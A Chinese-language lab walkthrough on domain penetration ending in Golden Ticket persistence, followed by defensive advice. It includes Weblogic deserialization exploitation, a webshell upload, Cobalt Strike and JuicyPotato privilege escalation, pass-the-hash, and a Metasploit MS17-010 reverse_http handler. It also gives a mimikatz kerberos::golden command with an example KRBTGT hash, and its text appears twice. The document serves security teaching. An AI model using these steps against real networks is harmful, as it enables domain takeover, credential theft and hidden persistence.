域渗透之黄金票据维持权限
字数 1881 2025-08-05 08:19:43

域渗透之黄金票据维持权限详细教学

一、环境搭建与初始信息收集

1.1 靶场环境配置

  • DC (域控制器):

    • IP: 10.10.10.10
    • OS: Windows Server 2012

  • WEB服务器:

    • 双网卡:
      • IP1: 10.10.10.80
      • IP2: 192.168.111.80
    • OS: Windows Server 2008
    • 运行服务:
      • Weblogic 10.3.6
      • MSSQL 2008

  • PC:

    • 双网卡:
      • IP1: 10.10.10.201
      • IP2: 192.168.111.201
    • OS: Windows 7

  • 攻击机:

    • Windows 10: 192.168.111.129
    • Kali Linux: 192.168.111.128

  • 网络划分:

    • 内网网段: 10.10.10.0/24
    • DMZ网段: 192.168.111.0/24

1.2 初始Web打点

  1. 端口扫描:

    • 发现445(SMB)、3389(RDP)、1433(MSSQL)、7001(Weblogic)端口开放

  2. Weblogic漏洞利用:

    • 尝试弱密码无果
    • 利用CVE-2019-2725反序列化漏洞执行命令
    • 上传冰蝎JSP Webshell到路径: 
      C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

  3. 初步信息收集:

    • 发现双网卡配置(10.10.10.80和192.168.111.80)
    • 确认在域环境中
    • net命令返回ERROR 5,权限不足

二、后渗透与权限提升

2.1 提权与信息收集

  1. CS上线:

    • 使用PowerShell上线Cobalt Strike
    • 使用甜土豆(juicypotato)进行提权

  2. 域信息收集:

    • nslookup查询DNS记录,发现10.10.10.10(疑似域控)
    • net time获取主域名称

  3. 密码抓取:

    • 获取MSSQL明文密码和Administrator明文密码
    • 尝试3389连接失败(权限不足)
    • 添加账户并提升到管理员组成功

2.2 横向移动

  1. 内网扫描:

    • 发现PC主机(192.168.111.201)和DC主机(10.10.10.10)

  2. Pass The Hash(PTH)攻击:

    • 使用抓取的Administrator账户和密码尝试PTH
    • 由于DC不出网,使用SMB beacon
    • 成功拿下DC

  3. MS17-010漏洞利用:

    • 扫描发现DC存在MS17-010漏洞
    • 使用MSF进行攻击: 
      use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost <本机IP>
set lport <端口>
exploit
    • 添加路由: 
      run get_local_subnets
run autoroute -s 10.10.10.0/24
run autoroute -p
    • 使用windows/smb/ms17_010_psexec模块成功利用

  4. DC密码抓取:

    • 使用hashdump获取KRBTGT账户hash
    • 使用logonpasswords查询域管账户

三、黄金票据制作与权限维持

3.1 黄金票据原理

黄金票据是伪造的票据授予票据(TGT),用于向KDC证明用户已被认证。特点:

  • 无需AS验证
  • 不依赖域管密码变化
  • 可长期维持域控权限

3.2 制作黄金票据的条件

  1. 域名称
  2. 域的SID值(去掉最后的-1001)
  3. 域的KRBTGT账户NTLM密码哈希
  4. 伪造的用户名

3.3 实际操作步骤

  1. 收集必要信息:

    • 域名称: 通过net time /domain获取
    • 域SID: 通过whoami /all或注册表查询
    • KRBTGT哈希: 通过hashdumpmimikatz获取

  2. 伪造黄金票据:

    • 使用mimikatz命令: 
      kerberos::golden /user:Administrator /domain:<域名> /sid:<域SID> /krbtgt:<KRBTGT哈希> /ptt
    • 示例(基于文中环境): 
      kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:a9b30e5b0dc865eadcea9411e4ade72d /ptt

  3. 验证黄金票据:

    • 尝试访问域控共享目录(之前无法访问)
    • 使用dir \\dc\c$验证权限
    • 可添加域管账户进行验证

3.4 权限维持优势

  1. 持久性:

    • 即使域控权限丢失,仍可通过边缘主机恢复
    • 不受域管密码修改影响

  2. 隐蔽性:

    • 不需要在域控上留下后门文件
    • 活动目录中无异常记录

  3. 高权限:

    • 可随时获取域管理员权限
    • 可创建新的域管账户

四、防御建议

  1. 保护KRBTGT账户:

    • 定期更改KRBTGT密码(两次更改间隔24小时)
    • 监控KRBTGT账户活动

  2. 检测黄金票据:

    • 监控异常Kerberos请求
    • 检查TGT的有效期(黄金票据通常设置超长有效期)

  3. 其他措施:

    • 启用Windows Defender Credential Guard
    • 限制域管理员登录权限
    • 实施LSA保护

  4. 日志监控:

    • 监控4769事件(Kerberos服务票据请求)
    • 关注异常时间段的认证活动

五、总结

黄金票据是域渗透中强大的权限维持技术,通过掌握KRBTGT账户的哈希和域SID,攻击者可以伪造任意用户的TGT票据,获得域管理员权限。防御关键在于保护KRBTGT账户安全、加强日志监控和实施适当的域策略。

域渗透之黄金票据维持权限详细教学 一、环境搭建与初始信息收集 1.1 靶场环境配置 DC (域控制器) : IP: 10.10.10.10 OS: Windows Server 2012 WEB服务器 : 双网卡: IP1: 10.10.10.80 IP2: 192.168.111.80 OS: Windows Server 2008 运行服务: Weblogic 10.3.6 MSSQL 2008 PC : 双网卡: IP1: 10.10.10.201 IP2: 192.168.111.201 OS: Windows 7 攻击机 : Windows 10: 192.168.111.129 Kali Linux: 192.168.111.128 网络划分 : 内网网段: 10.10.10.0/24 DMZ网段: 192.168.111.0/24 1.2 初始Web打点 端口扫描 : 发现445(SMB)、3389(RDP)、1433(MSSQL)、7001(Weblogic)端口开放 Weblogic漏洞利用 : 尝试弱密码无果 利用CVE-2019-2725反序列化漏洞执行命令 上传冰蝎JSP Webshell到路径: 初步信息收集 : 发现双网卡配置(10.10.10.80和192.168.111.80) 确认在域环境中 net命令返回ERROR 5,权限不足 二、后渗透与权限提升 2.1 提权与信息收集 CS上线 : 使用PowerShell上线Cobalt Strike 使用甜土豆(juicypotato)进行提权 域信息收集 : nslookup 查询DNS记录,发现10.10.10.10(疑似域控) net time 获取主域名称 密码抓取 : 获取MSSQL明文密码和Administrator明文密码 尝试3389连接失败(权限不足) 添加账户并提升到管理员组成功 2.2 横向移动 内网扫描 : 发现PC主机(192.168.111.201)和DC主机(10.10.10.10) Pass The Hash(PTH)攻击 : 使用抓取的Administrator账户和密码尝试PTH 由于DC不出网,使用SMB beacon 成功拿下DC MS17-010漏洞利用 : 扫描发现DC存在MS17-010漏洞 使用MSF进行攻击: 添加路由: 使用 windows/smb/ms17_010_psexec 模块成功利用 DC密码抓取 : 使用 hashdump 获取KRBTGT账户hash 使用 logonpasswords 查询域管账户 三、黄金票据制作与权限维持 3.1 黄金票据原理 黄金票据是伪造的票据授予票据(TGT),用于向KDC证明用户已被认证。特点: 无需AS验证 不依赖域管密码变化 可长期维持域控权限 3.2 制作黄金票据的条件 域名称 域的SID值(去掉最后的-1001) 域的KRBTGT账户NTLM密码哈希 伪造的用户名 3.3 实际操作步骤 收集必要信息 : 域名称: 通过 net time /domain 获取 域SID: 通过 whoami /all 或注册表查询 KRBTGT哈希: 通过 hashdump 或 mimikatz 获取 伪造黄金票据 : 使用mimikatz命令: 示例(基于文中环境): 验证黄金票据 : 尝试访问域控共享目录(之前无法访问) 使用 dir \\dc\c$ 验证权限 可添加域管账户进行验证 3.4 权限维持优势 持久性 : 即使域控权限丢失,仍可通过边缘主机恢复 不受域管密码修改影响 隐蔽性 : 不需要在域控上留下后门文件 活动目录中无异常记录 高权限 : 可随时获取域管理员权限 可创建新的域管账户 四、防御建议 保护KRBTGT账户 : 定期更改KRBTGT密码(两次更改间隔24小时) 监控KRBTGT账户活动 检测黄金票据 : 监控异常Kerberos请求 检查TGT的有效期(黄金票据通常设置超长有效期) 其他措施 : 启用Windows Defender Credential Guard 限制域管理员登录权限 实施LSA保护 日志监控 : 监控4769事件(Kerberos服务票据请求) 关注异常时间段的认证活动 五、总结 黄金票据是域渗透中强大的权限维持技术,通过掌握KRBTGT账户的哈希和域SID,攻击者可以伪造任意用户的TGT票据,获得域管理员权限。防御关键在于保护KRBTGT账户安全、加强日志监控和实施适当的域策略。